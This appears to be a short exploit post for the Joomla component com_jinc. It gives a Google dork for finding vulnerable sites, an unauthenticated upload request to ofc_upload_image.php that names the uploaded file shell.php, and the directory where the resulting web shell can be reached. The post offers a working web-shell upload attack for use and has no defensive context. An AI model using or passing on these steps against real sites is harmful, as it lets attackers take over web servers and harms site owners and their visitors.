Exploit Joomla! : com_jinc
POC:
Dork: inurl:option=com_jinc
Exploit:
/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=shell.php
Shell Uploaded to:
/administrator/components/com_jinc/classes/graphics/tmp-upload-images/shell.php
This exploit is exactly the same as the previous post: Exploit Joomla :com_maian15